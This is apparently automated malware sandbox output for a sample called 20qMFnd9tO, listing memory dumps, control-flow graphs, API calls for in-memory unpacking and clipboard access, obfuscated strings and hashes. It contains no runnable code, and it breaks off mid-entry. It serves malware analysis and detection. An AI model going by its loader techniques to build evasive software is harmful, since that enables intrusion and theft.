                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocString
                                              • String ID: $C$E$F$I$K$M$R$R$T
                                              • API String ID: 2525500382-2695317883
                                              • Opcode ID: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
                                              • Instruction ID: b65ea5a6236f1d5705806350ce78bc404e8b5f708e5abb6b759b3cc86dbe6bba
                                              • Opcode Fuzzy Hash: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
                                              • Instruction Fuzzy Hash: 53519D7450D7C0CEE771CB28C49879BBBE0AB96308F04895DD4DC8B382C7BA95499B57
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              control_flow_graph 73 434917-4349cb call 436470 * 3 80 434a06-434a0b 73->80 81 4349cd-4349cf 73->81 84 434a12-434ac7 call 436470 * 3 80->84 85 434a0d 80->85 82 4349d0-434a04 81->82 82->80 82->82 93 434b06-434b0b LoadLibraryW 84->93 94 434ac9 84->94 85->84 95 434b12-434b25 93->95 96 434b0d 93->96 97 434ad0-434b04 94->97 96->95 97->93 97->97
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: C%R+$C%R+$R5X;$R5X;$U)X/$U)X/$V98?$V98?
                                              • API String ID: 1029625771-17140411
                                              • Opcode ID: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
                                              • Instruction ID: 21bab591ecebe4fef30b80bc6ab6cda11f35366661598b552c3bc5dc332ec003
                                              • Opcode Fuzzy Hash: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
                                              • Instruction Fuzzy Hash: CA517EB4509301AFD704CF10E9A072FBBF1FB8AB08F14992DE49957262D734D945DB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              control_flow_graph 98 6e003c-6e0047 99 6e004c-6e0263 call 6e0a3f call 6e0e0f call 6e0d90 VirtualAlloc 98->99 100 6e0049 98->100 115 6e028b-6e0292 99->115 116 6e0265-6e0289 call 6e0a69 99->116 100->99 118 6e02a1-6e02b0 115->118 120 6e02ce-6e03c2 VirtualProtect call 6e0cce call 6e0ce7 116->120 118->120 121 6e02b2-6e02cc 118->121 127 6e03d1-6e03e0 120->127 121->118 128 6e0439-6e04b8 VirtualFree 127->128 129 6e03e2-6e0437 call 6e0ce7 127->129 130 6e04be-6e04cd 128->130 131 6e05f4-6e05fe 128->131 129->127 133 6e04d3-6e04dd 130->133 134 6e077f-6e0789 131->134 135 6e0604-6e060d 131->135 133->131 140 6e04e3-6e0505 LoadLibraryA 133->140 138 6e078b-6e07a3 134->138 139 6e07a6-6e07b0 134->139 135->134 141 6e0613-6e0637 135->141 138->139 142 6e086e-6e08be LoadLibraryA 139->142 143 6e07b6-6e07cb 139->143 144 6e0517-6e0520 140->144 145 6e0507-6e0515 140->145 146 6e063e-6e0648 141->146 150 6e08c7-6e08f9 142->150 147 6e07d2-6e07d5 143->147 148 6e0526-6e0547 144->148 145->148 146->134 149 6e064e-6e065a 146->149 151 6e07d7-6e07e0 147->151 152 6e0824-6e0833 147->152 153 6e054d-6e0550 148->153 149->134 154 6e0660-6e066a 149->154 155 6e08fb-6e0901 150->155 156 6e0902-6e091d 150->156 157 6e07e4-6e0822 151->157 158 6e07e2 151->158 162 6e0839-6e083c 152->162 159 6e0556-6e056b 153->159 160 6e05e0-6e05ef 153->160 161 6e067a-6e0689 154->161 155->156 157->147 158->152 163 6e056f-6e057a 159->163 164 6e056d 159->164 160->133 165 6e068f-6e06b2 161->165 166 6e0750-6e077a 161->166 162->142 167 6e083e-6e0847 162->167 169 6e057c-6e0599 163->169 170 6e059b-6e05bb 163->170 164->160 171 6e06ef-6e06fc 165->171 172 6e06b4-6e06ed 165->172 166->146 173 6e084b-6e086c 167->173 174 6e0849 167->174 181 6e05bd-6e05db 169->181 170->181 175 6e06fe-6e0748 171->175 176 6e074b 171->176 172->171 173->162 174->142 175->176 176->161 181->153
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 0e35a6c12bade70b1b465d455dd422e68b4f7a7e37c090aa8174b37a3a36a116
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 12527874A01269DFDB64CF59C984BA8BBB1BF09304F1480D9E90DAB351DB70AE85DF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              control_flow_graph 279 433f74-434ac7 call 436470 * 3 287 434b06-434b0b LoadLibraryW 279->287 288 434ac9 279->288 289 434b12-434b25 287->289 290 434b0d 287->290 291 434ad0-434b04 288->291 290->289 291->287 291->291
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: C%R+$R5X;$U)X/$V98?
                                              • API String ID: 1029625771-2675831890
                                              • Opcode ID: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
                                              • Instruction ID: d8ac3ec1662ce7fc204c67f60de0c5ebde28b7fe9e327e361a7d478e3e6a78fd
                                              • Opcode Fuzzy Hash: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
                                              • Instruction Fuzzy Hash: 5F21AEB4509301ABD704CF10E9A072BBBF1EBCAB09F14892DE49917252D738D945DB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -7.4$MR R
                                              • API String ID: 0-942721988
                                              • Opcode ID: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
                                              • Instruction ID: 492bbf8a237798f33d5a261da23dae48e0fbb4a352f940bd821eaad0080f4603
                                              • Opcode Fuzzy Hash: a2553a3257c9e09cdaacefa5ee88dd7e452b3dcb077e2faff38b9d95aea45a84
                                              • Instruction Fuzzy Hash: 98F139B0204B928AE725CF35D0647E7BBE1BF16309F44896DC0EB8B282DB7D6549CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004236FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: InstalledMemoryPhysicallySystem
                                              • String ID: -7.4$MR R
                                              • API String ID: 3960555810-942721988
                                              • Opcode ID: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
                                              • Instruction ID: 2fa671b28a049078f4dd0d03d5744d44717cea9c832a25525f32d7520d8a97d6
                                              • Opcode Fuzzy Hash: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
                                              • Instruction Fuzzy Hash: 43E14AB0204B528AE725CF35D4647E7BBE1BF16309F44896DC0EB8B382DB7D65098B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: >=$G1F7
                                              • API String ID: 1029625771-3563142761
                                              • Opcode ID: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
                                              • Instruction ID: 14da80cf22acf3b89c99242e8ca6be0b19683f6df11c328d6f7ee38423698bc4
                                              • Opcode Fuzzy Hash: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
                                              • Instruction Fuzzy Hash: A54108742083419BD718CF00D99475FBBE1BFC9B58F148A1CE8955B381D378D90A9B9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              • How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety., xrefs: 004090F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety.
                                              • API String ID: 621844428-3219661580
                                              • Opcode ID: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction ID: 1624d7f5e89d02a9961bc28c365e007a4165c690b29712144a0b90f16931b4fd
                                              • Opcode Fuzzy Hash: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction Fuzzy Hash: 5501F970A0C202E6D6103B76590F27A7A98AE51358F10053FE9827A2D3E67C4C1793AF
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00430707
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID: \
                                              • API String ID: 2039140958-2967466578
                                              • Opcode ID: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
                                              • Instruction ID: 669ce7c395f7719595b6c1e41dfd85534ccdbd0b1e6287d7c188649188475883
                                              • Opcode Fuzzy Hash: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
                                              • Instruction Fuzzy Hash: 8AE0D8B4780701BFE328CF10EC17F1A32A59B56708F21842DB352E51D0D7B0B5158E4D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,006E0223,?,?), ref: 006E0E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,006E0223,?,?), ref: 006E0E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 5910df1618b4d58ae791dba76823746767ea92d9917d6bbb5d2ec6216bae3b2e
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 4AD0123114522877D7002A95DC09BCD7B1CDF05B62F008421FB0DD9180C7B0994046E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00434F42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
                                              • Instruction ID: 9080a20ae45bcd27f959725e669f5616208f8f1387f58d0cde705380d5325144
                                              • Opcode Fuzzy Hash: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
                                              • Instruction Fuzzy Hash: 39315A352047408FD708CB19D8A175AB7E7FBCA308F59592DE896C7391DB74D8058B85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004321B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
                                              • Instruction ID: 92c4e559d7fdf9a385e00d3618763a18d143ea68be6cee5cca90d72daa594498
                                              • Opcode Fuzzy Hash: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
                                              • Instruction Fuzzy Hash: CA011370108381AFE304CF14D5A472BBBE1EBC5328F208A0DE8A907791C779D909CBCA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 004322AD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
                                              • Instruction ID: 690fc5bc2595e82f503e5c74ecb3b1a2912e957d418eaafec1a9f36fab02054a
                                              • Opcode Fuzzy Hash: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
                                              • Instruction Fuzzy Hash: 4E111C755026419FD7258F18C994B46BB62EB85328F34CA9EC4691B696C376E407CFC0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00435AF3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
                                              • Instruction ID: 4966d1c77637cc2c4b68332eedbb01f38c9df5c10605bfeb59e33d42c67c15c2
                                              • Opcode Fuzzy Hash: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
                                              • Instruction Fuzzy Hash: 56C01275600105AFDA108F40EC45A9AB725F785211F100575F50482454D330A8A6CAE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007E01D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DF000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7df000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: 3f552d6d29c595f277ed74092c07389877f35b388b14bfeeb542141edfb87861
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 1B113279A00248EFDB01DF99C985E98BBF5AF08350F158094F9489B361D375EA90DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$CpMN$E{$H$KDLG$NM$p){/$pC$s@KD
                                              • API String ID: 0-4175016407
                                              • Opcode ID: 5af8d17ef4e7fed4b8fc704a4b1e6647c81ab426705f32852f0354aac2e89cf3
                                              • Instruction ID: fef1747474a7e7982242e48d7d82ece4769b8e681e27744606833bf58869b501
                                              • Opcode Fuzzy Hash: 5af8d17ef4e7fed4b8fc704a4b1e6647c81ab426705f32852f0354aac2e89cf3
                                              • Instruction Fuzzy Hash: 2C1210B02093819BE318CF15C494BAFBBE2BBC5308F545D1DE4968B282D779D909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                              • String ID:
                                              • API String ID: 1006321803-3916222277
                                              • Opcode ID: bf7ba8f77189af705f82aa8c9bb68d6745b2dcbf3e68b876b289dd77a3488e34
                                              • Instruction ID: f4c19b65ddc9955578d64893f0c40d4310a5dafcf5dcc80618631c40f4c3c9e8
                                              • Opcode Fuzzy Hash: bf7ba8f77189af705f82aa8c9bb68d6745b2dcbf3e68b876b289dd77a3488e34
                                              • Instruction Fuzzy Hash: E1416C7150C391CBC3119B28948866FBFE0EB963A4F840A5EF8E157292C3389959CBD7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction ID: abc5aa138683d3d9df63c945dbd2d20fc7c0d52466c98eb01a499e42cbef2fbf
                                              • Opcode Fuzzy Hash: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction Fuzzy Hash: 4352CBB0204B41CFD735CF29C4947A2BBE1BF56304F148A6DD6EA8BAD2D739A409CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction ID: 9bcaecc95164b6e2b4aaddea902a6dfa901d177a8534c75ecc8350c67aaef8e5
                                              • Opcode Fuzzy Hash: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction Fuzzy Hash: 0D52CC70204B518BD335CF29D4907A3BBE1FF96304F548A6ED4EA8B792D738A409CB59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00100000,00003000,00000004), ref: 0071305E
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000040), ref: 00713167
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 007131C3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,000000B8,00008000), ref: 00713217
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00100000,00000000,?,00003000,00000004), ref: 0071323E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,?,00008000), ref: 0071355F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8d8faa2bfe266e6b8e188ecac92af4557114240aab7445a7e033f63275cb08ea
                                              • Instruction ID: fc02f6b4a10e8239fa11b4922086563ecef5e6ed671f02cd33d4d5384b5e4263
                                              • Opcode Fuzzy Hash: 8d8faa2bfe266e6b8e188ecac92af4557114240aab7445a7e033f63275cb08ea
                                              • Instruction Fuzzy Hash: CDE168711083819FD715CF28C880B6ABBE1BF89314F148A2DF5A5872D1D779EA49CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00100000,00003000,00000004), ref: 00432DF7
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000040), ref: 00432F00
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00432F5C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,000000B8,00008000), ref: 00432FB0
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00100000,00000000,?,00003000,00000004), ref: 00432FD7
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,?,00008000), ref: 004332F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: db5b1baf8f4c17b7056ca8a224d2de8d7ed5a272556f6fd533d7efa3e6180373
                                              • Instruction ID: 6901e04b5bfed640b9808015ee33ac261d83c230db4e7679f3eb9058c464b57b
                                              • Opcode Fuzzy Hash: db5b1baf8f4c17b7056ca8a224d2de8d7ed5a272556f6fd533d7efa3e6180373
                                              • Instruction Fuzzy Hash: 40E178711083419FD714CF18C880B2BBBE1BB89318F148A2EF5A487391D779E909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00718083
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 007180E1
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 007181A2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 007181FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: R-,T
                                              • API String ID: 292159236-635581381
                                              • Opcode ID: 63e7bc82cdb27067edc03b88e9deee4d14116444a1c5f864d62040e01fd9d2a2
                                              • Instruction ID: 627832f6d710a451b5fb767bd5cfe6a99672676dd44ee3fed0623b05a887b944
                                              • Opcode Fuzzy Hash: 63e7bc82cdb27067edc03b88e9deee4d14116444a1c5f864d62040e01fd9d2a2
                                              • Instruction Fuzzy Hash: 8DC1DE716083118FC714CF18C880A5EFBE1FF88718F19862CE8A59B3A1DB78D945CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437E1C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 00437E7A
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00437F3B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 00437F98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: R-,T
                                              • API String ID: 292159236-635581381
                                              • Opcode ID: c903464bdb493d5a38677b7f4801326b45717ed32c9b10d950e2fa214c2649b8
                                              • Instruction ID: 3dd0099d7a10fb4040d1ab2e05897a9660030bd435626c55e0cd4113b078addf
                                              • Opcode Fuzzy Hash: c903464bdb493d5a38677b7f4801326b45717ed32c9b10d950e2fa214c2649b8
                                              • Instruction Fuzzy Hash: F8C1BF716083119FC714CF18C880A1BF7E1EF98318F198A2DF9959B3A1DB78D905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBD45
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FBDA0
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBFE5
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FC040
                                              Strings
                                              Memory Dump Source
